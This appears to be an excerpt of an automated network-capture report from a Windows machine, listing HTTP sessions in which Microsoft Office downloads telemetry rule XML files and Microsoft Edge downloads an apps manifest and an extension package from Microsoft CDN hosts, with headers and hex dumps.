                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:44 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080644Z-174f7845968n2hr8hC1EWR9cag0000000w5g00000000e5ts
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    71192.168.2.74983713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:44 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080644Z-174f7845968g6hv8hC1EWR1v2n00000004hg000000007q58
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    72192.168.2.74983913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:44 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080644Z-174f7845968px8v7hC1EWR08ng0000000wtg00000000d0mh
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    73192.168.2.74984113.107.246.634438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Edge-Asset-Group: Shoreline
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC556INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:44 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                    Content-Length: 306698
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                                                                                                                                                                                                    ETag: 0x8DBC9B5C40EBFF4
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 9a11ecc5-b01e-0075-317f-40efbc000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080644Z-174f78459685726chC1EWRsnbg0000000wr0000000004uee
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC15828INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                                                                                                                                                                                                                                                    Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c 87 07 e7 d4 da 16 34 27 65 eb d7 87 be 44 96 29 71 b2 3a d6 6b
                                                                                                                                                                                                                                                                                                                    Data Ascii: [T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz|PVM&UOu~{-oM5QafAp4'eD)q:k
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d d9 e8 78 24 ab 24 51 69 66 82 d7 44 e8 1d cf c8 e2 16 60 37 02
                                                                                                                                                                                                                                                                                                                    Data Ascii: kD$>U|}mlBxz*BFSzP~|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)|[U35QTB-x$$QifD`7
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 6e 30 91 49 05 4e 42 60 22 53 9e 67 6f 08 ac 30 cf 05 cd b5 f5
                                                                                                                                                                                                                                                                                                                    Data Ascii: g9P3[=[b'1\%}~i?2tmA@0!0VC\:*_Gp`n3.e_j;`?ihbE}*Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqPn0INB`"Sgo0
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e 6f 2b 5e 74 f2 ea 6e 17 ed 6d 37 04 2d f5 5a 8e f8 43 2b c3 03
                                                                                                                                                                                                                                                                                                                    Data Ascii: MR\!1Q|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0o*j~~{Y1U}n|?*4>tk,OS]|w}:)y7gg3r#YU]oU~Cl.Vo+^tnm7-ZC+
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 4e 60 6b e1 20 c2 ba 99 b8 6d 1e 51 d5 3c d5 da e1 b5 2c a1 ec
                                                                                                                                                                                                                                                                                                                    Data Ascii: yfr;Tt5S};PtEr~*uVOLC=A{5__p*tHt|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\N`k mQ<,
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 45 bf 50 93 bc bc 7d c3 e9 75 22 5d 68 d9 1e 50 8f 5c 23 a1 36
                                                                                                                                                                                                                                                                                                                    Data Ascii: .Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>JcEP}u"]hP\#6
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 c6 95 ea 57 bd 73 50 18 1d 54 fb 07 d5 da 41 bd 99 aa 6f 53 85
                                                                                                                                                                                                                                                                                                                    Data Ascii: \m}v0d'R}g]]OZ&z+gK[|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{OWsPTAoS
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 65 5d 3f 2f 1b ab ff 79 9a 2b b3 79 5d 62 4f 7c d5 ff 34 22 f6
                                                                                                                                                                                                                                                                                                                    Data Ascii: Jj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;|.'Ocl7vUh&n{G]%vHN@e]?/y+y]bO|4"
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC16384INData Raw: 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 cb e9 d4 75 42 52 43 29 e8 e5 94 bf 82 e4 a6 c8 40 37 67 5f 41
                                                                                                                                                                                                                                                                                                                    Data Ascii: dqP7J"RUJS<?e3(Z.v4zg9>X#,~0*"1OvD#jK_F(Mu,abs&0`K`|'5Z:-#BoFX1-3JESJY(bJX*@D[93&Pq<jy@^2%S^?`>uBRC)@7g_A


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    74192.168.2.74984223.200.0.64438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:44 UTC618OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733299600&P2=404&P3=2&P4=F7wIzN8JKSqLYp%2bfkaBp%2fSSTc%2fD4EACUUd8Vkr8uh9nF3MTtYcsiuIPmQxYLWdRs16OSUyHvCXYrwmhNWV0aMw%3d%3d HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    MS-CV: w11S6kOdtJQkcH7fqyi2eU
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:45 UTC1251INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-chrome-extension
